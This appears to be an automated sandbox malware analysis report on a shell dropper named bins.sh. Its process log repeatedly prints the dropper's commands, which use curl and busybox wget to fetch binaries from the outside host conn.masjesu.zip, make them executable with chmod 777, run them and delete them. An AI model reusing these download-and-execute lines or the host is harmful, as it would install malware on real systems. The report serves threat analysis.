Malware Analysis Report

2025-06-15 21:07

Sample ID 241216-ev6w7stmdz
Target bins.sh
SHA256 cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
Tags
antivm defense_evasion discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb

Threat Level: Shows suspicious behavior

The file bins.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm defense_evasion discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

cURL User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-16 04:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-16 04:16

Reported

2024-12-16 04:33

Platform

debian12-armhf-20240221-en

Max time kernel

24s

Max time network

607s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J N/A
N/A /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 N/A
N/A /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE N/A
N/A /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen N/A
N/A /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ N/A
N/A /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ N/A
N/A /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX N/A
N/A /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht N/A
N/A /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO N/A
N/A /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA N/A
N/A /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj N/A
N/A /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p N/A
N/A /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf N/A
N/A /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ /usr/bin/curl N/A
File opened for modification /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht /usr/bin/curl N/A
File opened for modification /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 /usr/bin/curl N/A
File opened for modification /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX /usr/bin/curl N/A
File opened for modification /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj /usr/bin/curl N/A
File opened for modification /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf /usr/bin/curl N/A
File opened for modification /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA /usr/bin/curl N/A
File opened for modification /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p /usr/bin/curl N/A
File opened for modification /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J /usr/bin/curl N/A
File opened for modification /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/chmod

[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O

[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/rm

[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p

[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/rm

[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/chmod

[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf

[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/rm

[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/chmod

[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J

[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/rm

[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/chmod

[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8

[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/rm

[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/chmod

[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE

[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/rm

[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/chmod

[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen

[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/rm

[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/chmod

[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ

[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/rm

[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/chmod

[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ

[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/rm

[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/chmod

[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX

[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/rm

[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/chmod

[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht

[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/rm

[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/chmod

[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO

[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/rm

[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/chmod

[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA

[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/rm

[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/chmod

[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj

[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/rm

[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

/usr/bin/chmod

[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]

